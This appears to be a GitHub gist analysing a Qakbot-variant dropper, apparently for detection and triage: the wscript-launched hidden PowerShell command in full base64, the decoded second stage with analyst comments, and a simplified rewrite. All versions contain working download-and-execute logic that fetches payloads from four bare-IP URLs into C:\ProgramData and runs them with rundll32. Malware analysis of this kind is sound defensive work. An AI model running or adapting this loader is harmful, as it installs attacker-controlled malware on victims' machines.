@petergs
Last active January 4, 2024 06:03
qakbot-variant-dropper

Execution

wscript -> powershell -> .dll
"C:\Windows\System32\WScript.exe" "C:\Users\admin\Desktop\Uwgulbom.js" 
"C:\Windows\System32\wscript.exe" "C:\Users\admin\Desktop\Uwgulbom.js" seroplasticGodchild bankweedPolycratic unmiserly becassockedUndividedness 
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -NoLogo -NoProfile -encodedcommand "JABjAGEAbAB1AG0AbgBpAGEAdABlAGQARgBvAG8AbABoAGEAcgBkAGkAZQBzAHQAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCADEAQQBHADQAQQBkAEEAQgBvAEEARwA4AEEAYwBnAEIAdQBBAEMANABBAGIAZwBCAGgAQQBHAGMAQQBiAHcAQgA1AEEARwBFAEEAegBUAFAAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBQAEEASABVAEEAZABBAEIAbQBBAEcAawBBAFoAUQBCAHMAQQBHAFEAQQBaAFEAQgB5AEEASABNAEEATABnAEIAeQBBAEcAVQBBAGIAZwBCADAAQQBHAEUAQQBiAEEAQgB6AEEAQQA9AD0AegBUAFAAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgB3AEEARwA4AEEAYgBBAEIANQBBAEcATQBBAGEAQQBCAGgAQQBHAFUAQQBkAEEAQgB2AEEASABVAEEAYwB3AEEAdQBBAEgAYwBBAGIAdwBCAHkAQQBHAHcAQQBaAEEAQQA9ACIAOwAkAGgAZQBtAGEAZgBpAGIAcgBpAHQAZQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIASABBAEgASQBBAGIAdwBCADEAQQBHADQAQQBaAEEAQgByAEEARwBVAEEAWgBRAEIAdwBBAEcAVQBBAGMAZwBCAFUAQQBHAGsAQQBaAFEAQgAyAEEARwBrAEEAYgBnAEIAbABBAEMANABBAGQAZwBCAHAAQQBHAHcAQQBiAEEAQgBoAEEASABNAEEAUABNAFYAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARwBFAEEAYgBBAEIAdABBAEcAOABBAGIAZwBCAHAAQQBHADQAQQBaAHcAQQB1AEEASABNAEEAWQB3AEIAbwBBAEcAOABBAGIAdwBCAHMAQQBBAD0APQBQAE0AVgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHADAAQQBhAFEAQgBqAEEASABJAEEAYgB3AEIAegBBAEgAQQBBAGEAQQBCAGwAQQBIAEkAQQBhAFEAQgBqAEEARwBFAEEAYgBBAEIAVQBBAEcAZwBBAFoAUQBCAHYAQQBHAHcAQQBiAHcAQgBuAEEARwBVAEEAYwBnAEEAdQBBAEgATQBBAGIAdwBCAGoAQQBHAGsAQQBZAFEAQgBzAEEAQQA9AD0AUABNAFYAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBBAEEAYgBBAEIAbABBAEcAOABBAGMAdwBCAHcAQQBHADgAQQBjAGcAQgBoAEEARgBVAEEAYgBnAEIAMABBAEgASQBBAGEAUQBCAGwAQQBHAFEAQQBMAGcAQgBwAEEARwA0AEEAWgBnAEIAdgBBAEEAPQA9ACIAOwBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADUAOwAkAEkAcwBvAGMAZQBwAGgAYQBsAGkAcwBtACAAPQAgACIAUwBhAHkAeQBpAGQAcwBVAG4AYgBsAGEAcwBwAGgAZQBtAGUAZAAiADsAJABzAHAAZQBsAGwAZQBkACAAPQAgADIAMAA1ADsAJABwAGgAeQB0AGkAdgBvAHIAbwB1AHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBB
AEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEkAQQBOAFEAQQB6AEEAQwA0AEEATQBnAEEAeABBAEQARQBBAEwAZwBBADUAQQBEAFkAQQBMAGcAQQAyAEEARABBAEEASABhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBFADAAQQBZAFEAQgAwAEEARwBVAEEAYwBnAEIAcABBAEcARQBBAGIAQQBCAHAAQQBIAG8AQQBhAFEAQgB1AEEARwBjAEEATABnAEIAbQBBAEcAOABBAGIAdwBCADAAQQBHAEkAQQBZAFEAQgBzAEEARwB3AEEASABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADEAQQBEAGsAQQBMAGcAQQB4AEEARABRAEEATgBnAEEAdQBBAEQARQBBAE0AZwBBADQAQQBDADQAQQBNAFEAQQB4AEEARABrAEEASABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAGoAQQBHAEUAQQBjAEEAQgB2AEEASABJAEEAWQBRAEIAcwBBAEgATQBBAEwAZwBCAG4AQQBIAEkAQQBZAFEAQgAwAEEARwBrAEEAYwB3AEEAPQAiADsAJABBAG4AdABpAGMAbAB5AEQAZQBwAHIAZQBzAHMAYQBuAHQAaAAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAVQBBAE0AUQBBAHUAQQBEAEkAQQBNAHcAQQAyAEEAQwA0AEEATQBnAEEAeQBBAEMANABBAE0AUQBBADEAQQBEAGcAQQBMAHcAQgByAEEASABJAEEAZABRAEIAMQBBAEYAVQBBAFMAUQBBAHYAQQBIAFUAQQBhAFEAQgB1AEEARgBVAEEAZABBAEEAPQBaAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAVQBBAE8AQQBBAHUAQQBEAEkAQQBOAFEAQQAxAEEAQwA0AEEATQBnAEEAeABBAEQATQBBAEwAZwBBAHgAQQBEAEUAQQBNAEEAQQB2AEEASABJAEEAVQBRAEEANABBAEgAYwBBAFIAUQBCAEIAQQBGAEEAQQBMAHcAQQA1AEEARgBZAEEAVABBAEIARABBAEUATQBBAFoAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABVAEEATwBBAEEAdQBBAEQASQBBAE4AUQBBADEAQQBDADQAQQBNAGcAQQB4AEEARABNAEEATABnAEEAeQBBAEQAUQBBAE4AdwBBAHYAQQBHAGMAQQBXAGcAQgBZAEEARwAwAEEAYQBRAEIAcQBBAEMAOABBAE0AQQBCAHEAQQBGAFEAQQBVAEEAQQAyAEEARABrAEEAVwBRAEIAQwBBAEEAPQA9AFoAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABZAEEATQBnAEEAdQBBAEQASQBBAE4AUQBBAHkAQQBDADQAQQBNAFEAQQAzAEEARABVAEEATABnAEEAeQBBAEQASQBBAE4AQQBBAHYAQQBEAEUAQQBUAGcAQgB2AEEARQBRAEEAVwBBAEEAdgBBAEgARQBBAGEAZwBCAFYAQQBIAEUAQQBOAGcAQgBOAEEARABjAEEATwBRAEIAWgBBAEcAawBBAFQAUQBBAD0AIgA7AGYAbwByAGUAYQBjAGgAIAAoACQATQBpAHMAZABpAHMAcABvAHMAZQBSAGUAYQBzAHMAZQByAHQAaQBvAG4AIABpAG4AIAAkAEEAbgB0AGkAYwBsAHkARABlAHAAcgBlAHMAcwBhAG4AdABoACAALQBzAHAAbABpAHQAIAAiAFoAIgApACAAewAkAGwAYQBtAGUAbgB0
AGEAdABpAG8AbgBzAFAAYQByAGEAbgBlAHQAZQAgAD0AIAAiAG0AdQB0AHQAbwBuAGgAZQBhAGQAZQBkAG4AZQBzAHMATQBpAGMAcgBhAG4AdABoAHIAbwBwAG8AcwAiADsAdAByAHkAIAB7ACQAcABpAGUAcgBjAGUAbgB0ACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBRAEEASABJAEEAYQBRAEIAdABBAEcANABBAFoAUQBCAHoAQQBIAE0AQQBWAFEAQgB1AEEARwA4AEEAYwBnAEIAdQBBAEcARQBBAGIAUQBCAGwAQQBHADQAQQBkAEEAQgBoAEEARwB3AEEATABnAEIAagBBAEcARQBBAGMAdwBCAGgAQQBBAD0APQBVAFgAUgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEkAQQBNAFEAQQB4AEEAQwA0AEEATQBRAEEAMABBAEQARQBBAEwAZwBBADMAQQBEAE0AQQBMAGcAQQB5AEEARABBAEEATQBnAEEAPQAiADsAJABIAGUAbQBpAGEAbgBvAHAAaQBhACAAPQAgACIAbABpAGIAaQBkAGkAbgBpAHMAdAAiADsAJABmAGkAbgBlAHMAdAByAGEASQBtAHAAcgBvAHYAaQBzAG8AcgBzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAE0AaQBzAGQAaQBzAHAAbwBzAGUAUgBlAGEAcwBzAGUAcgB0AGkAbwBuACkAKQA7AHcAZwBlAHQAIAAkAGYAaQBuAGUAcwB0AHIAYQBJAG0AcAByAG8AdgBpAHMAbwByAHMAIAAtAE8AIABDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABXAGkAdABoAGUAcgBlAHIATwB1AHQAcgBhAG4AawBlAGQALgBwAGgAbwB0AG8AdABlAGwAZQBwAGgAbwBuAGUARgBlAG0AcAB0AHkAOwAkAFUAbgBkAGUAcgB0AGgAaQBlAGYAIAA9ACAAIgBQAHIAbwBvAGYAcgBvAG8AbQBVAG4AcABhAHQAcgBpAHMAdABpAGMAYQBsAGwAeQAiADsAaQBmACAAKAAoAEcAZQB0AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgAEMAOgBcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAFcAaQB0AGgAZQByAGUAcgBPAHUAdAByAGEAbgBrAGUAZAAuAHAAaABvAHQAbwB0AGUAbABlAHAAaABvAG4AZQBGAGUAbQBwAHQAeQApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADEANgA5ADEANQA0ACkAewAkAEIAYQBsAGwAYQBkAGUAcwAgAD0AIAAxADkAMAA7AHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAGUAbgBjAG8AZABlAGQAYwBvAG0AbQBhAG4AZAAgACIAYwB3AEIAMABBAEcARQBBAGMAZwBCADAAQQBDAEEAQQBjAGcAQgAxAEEARwA0AEEAWgBBAEIAcwBBAEcAdwBBAE0AdwBBAHkAQQBDAEEAQQBRAHcAQQA2AEEARgB3AEEAVQBBAEIAeQBBAEcAOABBAFoAdwBCAHkAQQBHAEUAQQBiAFEAQgBFAEEARwBFAEEAZABBAEIAaABBAEYAdwBBAFYAdwBCAHAAQQBIAFEAQQBhAEEAQgBsAEEASABJAEEAWgBRAEIAeQBBAEUAOABBAGQAUQBCADAAQQBIAEkAQQBZAFEAQgB1
AEEARwBzAEEAWgBRAEIAawBBAEMANABBAGMAQQBCAG8AQQBHADgAQQBkAEEAQgB2AEEASABRAEEAWgBRAEIAcwBBAEcAVQBBAGMAQQBCAG8AQQBHADgAQQBiAGcAQgBsAEEARQBZAEEAWgBRAEIAdABBAEgAQQBBAGQAQQBCADUAQQBDAHcAQQBjAEEAQgB5AEEARwBrAEEAYgBnAEIAMABBAEQAcwBBACIAOwBiAHIAZQBhAGsAOwB9AFIAZQBhAGMAdABKAFMAOwB9ACAAYwBhAHQAYwBoACAAewAkAG8AYgBzAHQAZQB0AHIAaQBjAGEAdABpAG8AbgBUAHIAbwBnAG8AbgBzACAAPQAgACIAUwBjAGgAbwBvAGwAYgBvAHkAaQBzAG0AIgA7ACQAUgBlAGMAaABhAG8AcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgAUQBBAGEAQQBCAHkAQQBHADgAQQBZAFEAQgAwAEEARwBrAEEAYgBnAEIAbgBBAEUAUQBBAFoAUQBCAHcAQQBHADgAQQBjAGcAQgAwAEEARwBFAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBDADQAQQBhAFEAQgAwAEEAQQA9AD0AZwB5AE0AQwBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAE0AQQBOAGcAQQB1AEEARABJAEEATQBBAEEAMwBBAEMANABBAE0AUQBBADAAQQBEAGcAQQBMAGcAQQAwAEEARABJAEEAZwB5AE0AQwBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBNAEEAQQAyAEEAQwA0AEEATgB3AEEAMQBBAEMANABBAE0AUQBBADMAQQBEAEUAQQBMAGcAQQB4AEEARABNAEEATQBnAEEAPQAiADsAfQB9ACQAYgBhAHIAYgBpAHQAYQBsAHMAUgBhAGQAaQBvAHAAYQBjAGkAdAB5ACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABBAEEATgBBAEEAdQBBAEQAVQBBAE0AZwBBAHUAQQBEAEkAQQBNAEEAQQB6AEEAQwA0AEEATQBnAEEAMQBBAEQAVQBBAFoAeQBRAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcARQBBAGMAZwBCAGsAQQBIAFUAQQBiAHcAQgAxAEEASABNAEEAYgBBAEIANQBBAEUAZwBBAFoAUQBCAHQAQQBHAGsAQQBkAEEAQgB5AEEARwA4AEEAYwBBAEIAaABBAEcAdwBBAEwAZwBCAG0AQQBHAGsAQQBjAHcAQgBvAEEAQQA9AD0AIgA7ACQAcABuAGUAbwBtAGEAbgBvAG0AZQB0AGUAcgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQAVQBBAE0AZwBBAHUAQQBEAEkAQQBOAEEAQQB6AEEAQwA0AEEATgBnAEEAeQBBAEMANABBAE0AUQBBADEAQQBEAGMAQQBOAEIAegBnAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIARABBAEcAOABBAFkAdwBCAHIAQQBHADQAQQBaAFEAQgA1AEEARwBZAEEAZQBRAEIAcABBAEcANABBAFoAdwBCAEoAQQBHADAAQQBjAEEAQgBoAEEASABJAEEAZABBAEIAbABBAEcAUQBBAEwAZwBCAGoAQQBHAEUAQQBkAEEAQgBsAEEASABJAEEAYQBRAEIAdQBBAEcAYwBBAE4AQgB6AGcAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2
AEEARgBBAEEAWgBRAEIAeQBBAEcAawBBAFkAZwBCAHkAQQBHADgAQQBiAGcAQgBqAEEARwBnAEEAYQBRAEIAaABBAEcAdwBBAEwAZwBCAG4AQQBIAFUAQQBhAFEAQgBrAEEARwBVAEEATgBCAHoAZwBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBIAEEAQQBiAEEAQgBsAEEARwA4AEEAYgBRAEIAdgBBAEgASQBBAGMAQQBCAG8AQQBHADgAQQBkAFEAQgB6AEEARgBRAEEAYgB3AEIAdABBAEcASQBBAGIAdwBCADUAQQBHAFkAQQBkAFEAQgBzAEEAQwA0AEEAYwBBAEIAcwBBAEEAPQA9ACIAOwA="

Obfuscated Powershell

The -encodedcommand payload, Base64-decoded and reformatted in CyberChef

# Decoded second stage, part 1: variable setup.
# Of the variables assigned here, only $AnticlyDepressanth is read later in this
# listing (by the foreach loop that follows). The rest are never referenced again
# and look like decoy/padding data intended to slow down analysis.

# Never referenced again in this listing. Same "aAB0AHQAcAA..." chunk shape as the
# live list, joined by a filler separator; presumably a decoy.
$calumniatedFoolhardiest = "aAB0AHQAcAA6AC8ALwB1AG4AdABoAG8AcgBuAC4AbgBhAGcAbwB5AGEAzTPaAB0AHQAcAA6AC8ALwBPAHUAdABmAGkAZQBsAGQAZQByAHMALgByAGUAbgB0AGEAbABzAA==zTPaAB0AHQAcAA6AC8ALwBwAG8AbAB5AGMAaABhAGUAdABvAHUAcwAuAHcAbwByAGwAZAA=";
# Never referenced again in this listing; presumably a decoy.
$hemafibrite = "aAB0AHQAcAA6AC8ALwBHAHIAbwB1AG4AZABrAGUAZQBwAGUAcgBUAGkAZQB2AGkAbgBlAC4AdgBpAGwAbABhAHMAPMVaAB0AHQAcABzADoALwAvAGEAbABtAG8AbgBpAG4AZwAuAHMAYwBoAG8AbwBsAA==PMVaAB0AHQAcABzADoALwAvAG0AaQBjAHIAbwBzAHAAaABlAHIAaQBjAGEAbABUAGgAZQBvAGwAbwBnAGUAcgAuAHMAbwBjAGkAYQBsAA==PMVaAB0AHQAcABzADoALwAvAFAAbABlAG8AcwBwAG8AcgBhAFUAbgB0AHIAaQBlAGQALgBpAG4AZgBvAA==";
# 15-second pause before any download is attempted.
# NOTE(review): presumably meant to outlast short automated sandbox runs - not provable from the script alone.
Start-Sleep -Seconds 15;
# Unused in this listing (junk string and junk integer).
$Isocephalism = "SayyidsUnblasphemed";
$spelled = 205;
# Never referenced again in this listing; presumably a decoy.
$phytivorous = "aAB0AHQAcABzADoALwAvADIANQAzAC4AMgAxADEALgA5ADYALgA2ADAAHaAB0AHQAcABzADoALwAvAE0AYQB0AGUAcgBpAGEAbABpAHoAaQBuAGcALgBmAG8AbwB0AGIAYQBsAGwAHaAB0AHQAcAA6AC8ALwA1ADkALgAxADQANgAuADEAMgA4AC4AMQAxADkAHaAB0AHQAcAA6AC8ALwBjAGEAcABvAHIAYQBsAHMALgBnAHIAYQB0AGkAcwA=";
# The live download list: the foreach loop splits this string on "Z" and decodes
# each piece (Base64 -> UTF-16LE text) into a URL.
# NOTE(review): the last segment's own Base64 contains a literal "Z"
# ("...OQBZAGkATQA="), so a split on "Z" also cuts inside that segment. The final
# URL recovered by splitting this way may be truncated - decode the unsplit
# segment and verify before using that URL as an indicator.
$AnticlyDepressanth = "aAB0AHQAcAA6AC8ALwAxADUAMQAuADIAMwA2AC4AMgAyAC4AMQA1ADgALwBrAHIAdQB1AFUASQAvAHUAaQBuAFUAdAA=ZaAB0AHQAcAA6AC8ALwAxADUAOAAuADIANQA1AC4AMgAxADMALgAxADEAMAAvAHIAUQA4AHcARQBBAFAALwA5AFYATABDAEMAZaAB0AHQAcAA6AC8ALwAxADUAOAAuADIANQA1AC4AMgAxADMALgAyADQANwAvAGcAWgBYAG0AaQBqAC8AMABqAFQAUAA2ADkAWQBCAA==ZaAB0AHQAcAA6AC8ALwAxADYAMgAuADIANQAyAC4AMQA3ADUALgAyADIANAAvADEATgBvAEQAWAAvAHEAagBVAHEANgBNADcAOQBZAGkATQA=";
# Decoded second stage, part 2: download-and-execute loop.
# Walks the "Z"-separated pieces of $AnticlyDepressanth, tries each as a download
# URL, and stops at the first download that passes the size check.
foreach ($MisdisposeReassertion in $AnticlyDepressanth -split "Z") {
    # Unused junk assignment.
    $lamentationsParanete = "muttonheadednessMicranthropos";
    try {
        # Unused in this listing; presumably decoy data like the other unread strings.
        $piercent = "aAB0AHQAcAA6AC8ALwBQAHIAaQBtAG4AZQBzAHMAVQBuAG8AcgBuAGEAbQBlAG4AdABhAGwALgBjAGEAcwBhAA==UXRaAB0AHQAcABzADoALwAvADIAMQAxAC4AMQA0ADEALgA3ADMALgAyADAAMgA=";
        # Unused junk assignment.
        $Hemianopia = "libidinist";
        # Base64-decode the current piece and read the bytes as UTF-16LE
        # ([System.Text.Encoding]::Unicode) to get the URL string. A malformed
        # piece makes FromBase64String throw, which lands in the catch below.
        $finestraImprovisors = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($MisdisposeReassertion));
        # wget is the Windows PowerShell alias for Invoke-WebRequest; the response
        # body is written to a fixed path under C:\ProgramData with a nonsense
        # extension instead of .dll.
        wget $finestraImprovisors -O C:\ProgramData\WithererOutranked.phototelephoneFempty;
        # Unused junk assignment.
        $Underthief = "ProofroomUnpatristically";
        # Size gate: continue only if the downloaded file is at least 169154 bytes.
        # NOTE(review): presumably filters out error pages and partial downloads.
        if ((Get-Item -Path C:\ProgramData\WithererOutranked.phototelephoneFempty).Length -ge 169154){
            # Unused junk assignment.
            $Ballades = 190;
            # Child PowerShell with a second encoded command. Per the cleaned-up
            # listing on this page it launches rundll32 on the downloaded file
            # with the export name "print".
            powershell -encodedcommand "cwB0AGEAcgB0ACAAcgB1AG4AZABsAGwAMwAyACAAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAVwBpAHQAaABlAHIAZQByAE8AdQB0AHIAYQBuAGsAZQBkAC4AcABoAG8AdABvAHQAZQBsAGUAcABoAG8AbgBlAEYAZQBtAHAAdAB5ACwAcAByAGkAbgB0ADsA";
            # Stop after the first payload that passed the size gate.
            break;
        }
        # NOTE(review): "ReactJS" is not defined anywhere in this listing and is not
        # a standard PowerShell command; presumably junk. If it does not resolve,
        # the resulting error is caught below and the loop moves to the next piece.
        ReactJS;
    } 
    catch {
        # Every failure (bad Base64, failed download, missing file) is swallowed
        # here; the body only assigns more unread strings, then the loop continues.
        $obstetricationTrogons = "Schoolboyism";
        $Rechaos = "aAB0AHQAcABzADoALwAvAHQAaAByAG8AYQB0AGkAbgBnAEQAZQBwAG8AcgB0AGEAdABpAG8AbgBzAC4AaQB0AA==gyMCaAB0AHQAcAA6AC8ALwAxADMANgAuADIAMAA3AC4AMQA0ADgALgA0ADIAgyMCaAB0AHQAcABzADoALwAvADEAMAA2AC4ANwA1AC4AMQA3ADEALgAxADMAMgA=";
    }
}
# Trailing assignments placed after the download loop. Nothing in this listing
# reads them, so they have no effect on execution; presumably more decoy data.
$barbitalsRadiopacity = "aAB0AHQAcAA6AC8ALwAxADAANAAuADUAMgAuADIAMAAzAC4AMgA1ADUAZyQaAB0AHQAcABzADoALwAvAGEAcgBkAHUAbwB1AHMAbAB5AEgAZQBtAGkAdAByAG8AcABhAGwALgBmAGkAcwBoAA==";
$pneomanometer = "aAB0AHQAcAA6AC8ALwAyADUAMgAuADIANAAzAC4ANgAyAC4AMQA1ADcANBzgaAB0AHQAcAA6AC8ALwBDAG8AYwBrAG4AZQB5AGYAeQBpAG4AZwBJAG0AcABhAHIAdABlAGQALgBjAGEAdABlAHIAaQBuAGcANBzgaAB0AHQAcABzADoALwAvAFAAZQByAGkAYgByAG8AbgBjAGgAaQBhAGwALgBnAHUAaQBkAGUANBzgaAB0AHQAcABzADoALwAvAHAAbABlAG8AbQBvAHIAcABoAG8AdQBzAFQAbwBtAGIAbwB5AGYAdQBsAC4AcABsAA==";

Removing the cruft (unused variables dropped, URL list decoded)

# Analyst's simplified view of the dropper logic: junk variables removed and the
# "Z"-separated Base64 list replaced by its decoded URLs. This is a reading aid,
# not a byte-for-byte equivalent of the sample.
#
# Behaviours visible here that are useful for detection and triage:
#   - HTTP downloads to bare IP addresses from a PowerShell child of wscript.exe
#   - a file written to C:\ProgramData with a non-.dll extension
#   - rundll32 loading that file with the export name "print"

# 15-second delay before the first download attempt.
Start-Sleep -Seconds 15;
# NOTE(review): "[ ... ]" is shorthand and not valid PowerShell array syntax (an
# array literal would be @( ... )). The last URL may also be truncated: in the
# obfuscated listing the final Base64 segment contains a literal "Z", so a split
# on "Z" cuts inside it - verify against the unsplit segment before relying on it.
$urls = ["http://151.236.22.158/kruuUI/uinUt", "http://158.255.213.110/rQ8wEAP/9VLCC", "http://158.255.213.247/gZXmij/0jTP69YB", "http://162.252.175.224/1NoDX/qjUq6M79"]
# Try each URL in order until one yields a large enough file.
foreach ($url in $urls) {
    try {
        # wget is the Windows PowerShell alias for Invoke-WebRequest; every attempt
        # writes to the same output path.
        wget $url -O C:\ProgramData\WithererOutranked.phototelephoneFempty;
        # Execute only when the download is at least 169154 bytes.
        if ((Get-Item -Path C:\ProgramData\WithererOutranked.phototelephoneFempty).Length -ge 169154){
            # Load the downloaded file through rundll32, calling its "print" export.
            Start-Process rundll32 C:\ProgramData\WithererOutranked.phototelephoneFempty,print;
            # Stop after the first launch.
            break;
        }
    } 
    # Download and file errors are silently ignored; the loop moves to the next URL.
    catch{}
}